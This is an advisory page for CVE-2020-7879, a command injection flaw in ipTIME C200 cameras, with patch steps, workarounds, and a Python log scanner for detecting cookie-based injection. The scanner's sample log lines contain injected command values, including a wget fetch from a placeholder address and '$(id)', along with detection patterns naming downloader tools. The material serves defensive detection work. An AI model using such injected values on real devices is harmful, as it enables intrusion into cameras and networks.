CVE-2020-7879

8.8 HIGH

📋 TL;DR

CVE-2020-7879 is an OS command injection vulnerability in ipTIME C200 IP cameras that are synchronized with ipTIME NAS devices. An unauthenticated attacker can execute arbitrary commands on the camera by manipulating the cookie values sent from the NAS. This affects organizations using vulnerable ipTIME camera/NAS combinations.

💻 Affected Systems

Products:
  • ipTIME C200 IP Camera
Versions: All versions prior to patched firmware
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Requires synchronization with ipTIME NAS devices to trigger the vulnerability.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the IP camera allowing persistent access, lateral movement to other network devices, and use as a foothold for further attacks.

🟠 Likely Case

Remote code execution leading to camera compromise, surveillance disruption, and potential credential harvesting.

🟢 If Mitigated

Limited impact if cameras are isolated on separate VLANs with strict network segmentation.

🌐 Internet-Facing: HIGH - IP cameras are often exposed to the internet for remote access, making them prime targets.
🏢 Internal Only: MEDIUM - Still vulnerable to internal attackers or compromised devices on the same network.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires network access to the camera and knowledge of the synchronization mechanism.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor for latest firmware

Vendor Advisory: https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36365

Restart Required: Yes

Instructions:

1. Download latest firmware from ipTIME website.
2. Access camera web interface.
3. Navigate to firmware update section.
4. Upload and apply new firmware.
5. Reboot camera.

🔧 Temporary Workarounds

Disable NAS synchronization (platform: all)

Prevent the vulnerable synchronization feature from being used

Access camera web interface -> Settings -> NAS Sync -> Disable

Network segmentation (platform: all)

Isolate cameras on separate VLAN from critical systems

🧯 If You Can't Patch

  • Disable remote access to cameras and restrict to internal network only
  • Implement strict firewall rules blocking unnecessary ports and protocols

🔍 How to Verify

Check if Vulnerable:

Check if camera is synchronized with ipTIME NAS and examine firmware version against known vulnerable versions

Check Version:

Check camera web interface -> System Information -> Firmware Version

Verify Fix Applied:

Verify firmware version has been updated and test synchronization feature for command injection

📡 Detection & Monitoring

Log Indicators:

  • Unusual wget commands in system logs
  • Unexpected cookie values in HTTP requests
  • Abnormal process execution

Network Indicators:

  • Suspicious HTTP requests to camera with manipulated cookie headers
  • Unexpected outbound connections from camera

SIEM Query:

source="camera_logs" AND (wget OR cookie) AND command=*
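
The cookie and wget indicators listed above can be checked mechanically over proxy or IDS logs. The following Python script is an added example, not taken from the vendor advisory or from ipTIME; the log line format, cookie names, addresses and sample values are constructed assumptions, and the metacharacter list should be tuned to the cookies your devices actually use.

```python
import re
from urllib.parse import unquote

# Shell metacharacters that should not appear in a cookie value (tune per environment).
SHELL_META = re.compile(r"[`|&<>\n\r]|\$\(|\$\{")
# wget is named in the page's log indicators; curl and tftp are assumed additions.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp)\b", re.I)
# Assumed log format: src=<ip> dst=<camera ip> cookie="<raw Cookie header>"
LOG_LINE = re.compile(r'src=(?P<src>\S+) dst=(?P<dst>\S+) cookie="(?P<cookie>[^"]*)"')

def cookie_findings(cookie_header):
    """Return the reasons a Cookie header looks like a command injection attempt."""
    findings = []
    decoded = unquote(cookie_header)  # also catches %3B, %60, %24%28 and similar
    for segment in decoded.split(";"):
        segment = segment.strip()
        if not segment:
            continue
        name, sep, value = segment.partition("=")
        if not sep:
            # An injected ';' splits the value and leaves a segment with no name=value shape.
            findings.append(f"segment without '=': {segment!r}")
            value = segment
        if SHELL_META.search(value):
            findings.append(f"shell metacharacter in {name!r}")
        if DOWNLOADERS.search(value):
            findings.append(f"downloader keyword in {name!r}")
    return findings

def scan(lines):
    alerts = []
    for line in lines:
        m = LOG_LINE.search(line)
        reasons = cookie_findings(m["cookie"]) if m else []
        if reasons:
            alerts.append((m["src"], m["dst"], reasons))
    return alerts

# Constructed sample lines: format, cookie names and values are made up for this example.
SAMPLE = [
    'src=192.0.2.10 dst=192.0.2.50 cookie="sid=8f3a9c; lang=ko"',
    'src=192.0.2.77 dst=192.0.2.50 cookie="sid=x%3Bwget%20http://198.51.100.9/a"',
    'src=192.0.2.78 dst=192.0.2.50 cookie="sid=$(id)"',
]

if __name__ == "__main__":
    for src, dst, reasons in scan(SAMPLE):
        print(src, "->", dst, reasons)
```

Alerts from a source other than the paired NAS, or any alert followed by an outbound connection from the camera, deserve priority triage.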
